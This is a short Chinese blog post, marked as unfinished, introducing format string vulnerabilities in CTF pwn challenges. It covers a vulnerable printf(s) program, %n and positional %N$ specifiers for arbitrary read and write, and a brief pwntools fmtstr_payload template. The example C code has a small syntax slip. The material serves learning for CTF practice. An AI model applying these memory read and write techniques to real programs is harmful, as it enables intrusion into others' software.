初步学习CTF格式化字符串漏洞(待更新)

最新推荐文章于 2024-05-28 15:44:18 发布
最新推荐文章于 2024-05-28 15:44:18 发布
阅读量946 收藏 2
点赞数
分类专栏: ctf 文章标签: 格式化字符串漏洞 ctf

初步学习CTF格式化字符串漏洞(待更新)

文章目录


https://veritas501.space/2017/04/28/格式化字符串漏洞学习/

  • List item

看看例子


int main() {
  char s[60];
  char v6
  FILE* stream = fopen("flag.txt", "r"); // 打开flag文件
  fgets(&v6, 64, stream);	//将flag读入v6所在地址
  // 读入什么就输出什么
  while(1){
  	scanf("%s", s);
  	printf(&s);
  }
  return 0;
}

先分析发现没有栈溢出漏洞,确定是格式化字符串漏洞

格式化字符串漏洞原理

首先了解一下什么是格式化字符串:格式化字符串是用来告诉程序如何进行格式化输出的说明符。常用的:

%d - 十进制 - 输出十进制整数
%s - 字符串 - 从内存中读取字符串
%x - 十六进制 - 输出十六进制数
%c - 字符 - 输出字符
%p - 指针 - 指针地址
%n - 将之前printf已经打印的字符个数赋值给传入的指针        //!!!!bug
利用格式化字符串进行任意地址读

以上面那道题为例,若输入

// number: 数字后面会说该如何确定
// format: 确定输出内容的格式

%<number>$<format>

可以输出指向格式化字符串指针后的第n地址的值,以format指定内容输出

利用格式化字符串进行任意地址写

另一个比较有用的格式化字符串是==%n==
%n - 将之前printf已经打印的字符个数赋值给传入的指针

#include <stdio.h>

int main(void)
{
	int c = 0; 
	printf("the use of %n", &c);
	printf("%d\n", c);
	return 0;
}

上面程序的输出会变成11

pwntools

第一步定义运行函数

def exec_fmt(payload):
	 p = process('./auth')
	 p.sendline(payload)
	 return p.recvall()

第二步通过运行函数得到offset

autofmt = FmtStr(exec_fmt)
offset = autofmt.offset

第三部生成payload

payload = fmtstr_payload(offset, {0x804a04c: 0x00000001})
哔xxx
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CTF]PWN--手搓格式化字符串漏洞
2301_79880752的博客
02-19 905
而是,原来我们修改了的其实是0x7f1与0x7f2里的东西,那后面我们就需要修改0x7f3与0x7f4里的东西,因此我们+2的意思就是将原来的0x7f1+2,修改成0x7f3,这样,我们在修改的时候改的就是0x7f3与0x7f4里的东西了(思路是这样的,一个栈地址一共八个字节,我们需要将要修改的地址和被修改的地址每两个字节对应的修改,直到最后将所以字节都修改成我们需要的地址。修改最高二位的时候也是一样的,由于栈里面的地址与libc里面的地址一般都只占6个字节,因此,我们只需要进行三次修改即可。
格式化字符串漏洞 | 劫持printf_got表】[Google CTF]fmt_pwn
Mr_Fmnwon的博客
10-29 487
浅记录一下格式化字符串劫持printf_got表,比较简单,仅记录exp。
CTF| 格式化字符串漏洞
最新发布
2401_84466227的博客
05-28 1016
printf("格式化字符串",参数...)该printf函数的第一个参数是由格式化说明符与字符串组成,用来规定参数用什么格式输出内容。格式化说明符:%d - 十进制 - 输出十进制整数%s - 字符串 - 从内存中读取字符串%x - 十六进制 - 输出十六进制数%c - 字符 - 输出字符%p - 指针 - 指针地址%n - 到目前为止所写的字符数例如:return 0;调用以后会显示:特别要注意的是%n这个格式化字符串,它的功能是将%n。
CTF中简单杂项小结
Amire0x的小乐园
03-09 7445
MISC1 参考 CTF Wiki MISC 简介 主要分为几个板块:Recon,Forensic,Stego,Crypto(古典密码)… Recon:信息收集 主要介绍一些获取信息的渠道和一些利用百度、谷歌等搜索引擎的技巧 Encode(编码转换) 主要介绍在 CTF 比赛中一些常见的编码形式以及转换的技巧和常见方式 Forensic && Stego(数字取证 && 隐写分析) 隐写取证是 Misc 中最为重要的一块,包括文件分析、隐写、
CTF训练(PWN)——format_secret
weixin_49270591的博客
04-12 439
CTF训练(PWN)——format_secret 这次拿到的是一道pwn题,作为新手只能慢慢学习(啊啊啊啊,pwn是真的难~~) 读题 根据描述,知道是格式化字符串漏洞,于是去度娘了解一下格式化字符串漏洞是什么??? 这里附上来自同站大佬的链接:https://blog.csdn.net/qq_43394612/article/details/84900668 分析题目 首先下载附件 拿到一个意义不明的白色文件 解题 首先使用checksec进行查看 没有的话可以使用git进行安装 git clone
[BUUCTF]PWN——xman_2019_format(堆上的fmt+爆破栈)
mcmuyanga的博客
03-22 602
xman_2019_format 例行检查,32位程序,开启了nx 检索程序里的字符串,发现了后门函数,back_doorr=0x80485AB 这题buf并不存储在栈上,而是在malloc申请的堆上 之后buf作为参数,进入到sub_80485C4 由于存在后门函数,可以利用格式化字符串将返回地址改为back_door 这边主要利用了%ac$bn,将长度a的数据写入偏移为b的位置。 格式化字符串漏洞,一般需要先泄露栈地址,然后计算偏移,但是这里没办法这么利用,因为这里的s存放在chunk上,不在
CTF-PWN-printf(实验吧|格式化字符漏洞)
SuperGate的博客
02-01 3242
首先运行文件,发现需要输入name,于是打开ida逆向出正确的name,来到了程序主界面。 首先我们先逐一判断函数的用途。put_file是让我们输入文本名称和内容,get_file是让我们输入文本名称,然后程序输出文本内容。show_dir是按照先来后出输出所有的文本名称,并且无缝衔接。 这个时候我们发现get_file函数中显然有一个格式化字符漏洞。 这种漏洞会导致我们可以控制任意内存的...
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
如果攻击者能够修改这个序列化字符串的长度,例如通过注入额外的数据,可能会影响反序列化过程。在某些情况下,这可能导致原本不应该执行的代码片段被执行,或者导致对其他数据的访问。 为了利用这种漏洞,攻击者...
PHP反序列化漏洞详解.rar
02-07
参赛者需要分析代码,理解类和对象的结构,然后构造特定的序列化字符串来触发漏洞。同时,防御方则需要设计安全的代码,防止此类漏洞被利用。 总的来说,PHP反序列化漏洞是一个复杂且危险的安全问题,涉及到对PHP...
CTF中的其他漏洞1
08-03
本篇内容主要讨论了CTF中除常见漏洞之外的一些特殊类型,包括格式化字符串漏洞、竞争条件漏洞、代码逻辑漏洞以及类型混淆漏洞,并提供了相应的例子和解决方法。 1. **格式化字符串漏洞**: 格式化字符串漏洞通常...
yaml反序化漏洞本地环境复现
11-23
6. **安全防护**:学习如何避免和修复这类漏洞,包括但不限于禁用不安全的反序列化选项,使用白名单机制限制反序列化的类,以及及时更新库到安全版本。 了解并复现yaml反序列化漏洞有助于提升对这类安全问题的认识...
信息安全_CTF中PWN题目实例分析.pptx
08-14
在本文中,我们将深入分析 PWN 题目中的常见漏洞,包括堆栈溢出漏洞格式化字符串漏洞,并对其进行详细的分析和解释。 堆栈溢出漏洞 堆栈溢出漏洞是一种常见的漏洞类型,发生在函数调用时,函数的返回地址被覆盖...
[XYCTF新生赛]-PWN:fmt解析(scanf格式化字符串漏洞,任意地址写)
2301_79326813的博客
05-03 208
查看保护查看ida这里没什么好说的。
CTF之PWN学习入门
11-02
  从基础开始,一步步教同学们从基础的栈溢出,栈溢出的原理以及在64位程序与32位程序下,如何去构造EXP,以及在有一般保护的情况下如你构造ROP链,在没有binsh与system函数的情况下如何去构造泄露如put,printf,write等函数的真实地址。然后教大家格式化字符串漏洞的利用,在开启canary下即存在栈溢出与格式化漏洞的情况下如保构造EXP来打通获取一个shell。学完课程同学们能够掌握格式化字符串漏洞与栈溢出漏洞的原理以及如何去构造EXP,掌握原理。
i春秋·网络内生安全训练场 pwn Car Search System
qq_43677324的博客
12-01 265
i春秋·网络内生安全训练场 pwn Car Search System memcpy是memory copy的缩写,意为内存复制,在写C语言程序的时候,我们常常会用到它。它的函原型如下: void *memcpy(void *dest, const void *src, size_t n); 它的功能是从src的开始位置拷贝n个字节的数据到dest。如果dest存在数据,将会被覆盖。memcpy...
2016 TSCTF 初赛
think_ycx的专栏
04-03 773
pwn1thoughts在第一个子函数布置shellcode(bss段的地址可定位)。puts("I'm zhouheiya, what about you?"); read(0, &format, 0x32u); printf(&format);此处存在bof,计算偏移覆盖返回地址为bss段中shellcode地址即可。puts("I'm datouerzi, what about you?");
python3-pwntools教程_一步一步学pwntools
weixin_39624429的博客
12-23 1224
刚刚注册看雪,就来水一篇文章。本来想发发我之前CTF的writeups,不过数量有点多,而且网上也有很多质量不错的wp,就发回之前写的pwntools新手教程。网上纯新手教程比较少,一般都是直接调用api,这篇主要是想给新手对pwntool一个更整体的认识。原文是我用英文写的,如果翻译的不好,请见谅。英语原文:下面开始正文:序pwntools是一个二进制利用框架。官方文档提供了详细的api规范。然...
格式化字符串漏洞
Starr
03-22 1769
文章目录1. 再看printfprintf家族函数转换规则2. 漏洞原理危害防范3. 任意地址内存泄漏 Demo4. 覆盖栈数据5. 任意地址覆盖6. Pwntool Demo7. 工具8. 参考文章 格式化字符串漏洞基本已经销声匿迹了,不过在iot设备上可能还会存在。 1. 再看printf printf家族函数 #include <stdio.h> int printf(); int fprintf(); int dprintf(); int sprintf(); int snprintf(
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至。
07-23 1801
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
如何学习编写漏洞利用脚本
06-06
建议学习常见的漏洞类型,如堆溢出、栈溢出、格式化字符串漏洞等。 4. 实践漏洞利用:学习编写漏洞利用脚本需要不断实践,可以通过搭建实验环境、参加CTF比赛等方式进行实践。 总之,学习编写漏洞利用脚本需要不断...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值